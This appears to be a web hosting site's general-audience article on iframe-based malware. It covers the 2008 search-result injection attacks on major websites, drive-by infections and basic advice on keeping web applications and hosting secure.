Over the years, the internet has become a heaven for malware writers. New strains of infectious code are launched into cyberspace on a frequent basis and one of the latest threats is IFrame. This malicious nuisance is growing quickly, constantly evolving to threaten not only web surfers, but website owners and hosting providers as well.

What is iFrame?

In is its original form, an Inline Frame or IFrame, doesn’t function with malicious intent. Formed when embedding one HTML document inside of another, it is typically used to insert content from other sources into a web page. This could be a simple document or an advertisement. A designer can change the content of an IFrame without needing the user to reload the page. Though it functions like an inline image, it can be configured to have its own features independent of the page it is embedded on. IFrames have been used in various
e-commerce applications as well as pages like Google Maps that utilize AJAX and other Java elements. Unfortunately, the mere structure of this technology has allowed it to be used for malicious gain.

This site is infected by an iframe malware

The Outbreak

IFrame became a dangerous malware tool in the early part of 2008. It was around this time that several hackers implemented the code into internet search results. This led to IFrame overflow attacks on some of today’s most prominent websites. The sites victimized by this exploit were operated by entities such as ABC News, USA Today, Wal-Mart and ZDNet among others. By inserting the malicious code into the search results of legitimate sites, the attackers were able to redirect any visitor that clicked on the link provided by the rogue search tool, automatically redirecting them to the infected site. From there, the unknowing user is automatically infected with malware. By compromising so many unsuspecting websites, the malicious IFrame code was able to spread like wildfire and inflict considerable damage in a very short amount of time.

The craze behind IFrame malware is an effective technique that doesn’t require a hacker to directly attack a web server. Instead, they leverage popular, highly search engine optimized sites to not only benefit from higher rankings, but also the results of whatever the malicious code is designed to do. IFrame is often employed through “drive-by” attacks as well as social engineering techniques that trick users into installing software like video codecs that are actually Trojans in disguise. IFrame attacks are a major threat to any insecure web server and particularly Windows operating systems that have not applied the critical MS04-040 update for Internet Explorer. This essentially means that there are a large number of vulnerable systems out there.

Example of Attacked site

How to Protect Yourself

Search engine operators such as Google and Yahoo are working diligently to eliminate malware infested search results and warn internet users about malicious websites. In the meantime, you need to be devising strategies to protect your own site. Because these scripts can be embedded without your knowledge, the best protection involves a reliable web hosting service and making sure that your web applications are frequently updated and secure.

See Hosting Comparison Chart

See Top 10 Web Hosting

Related Articles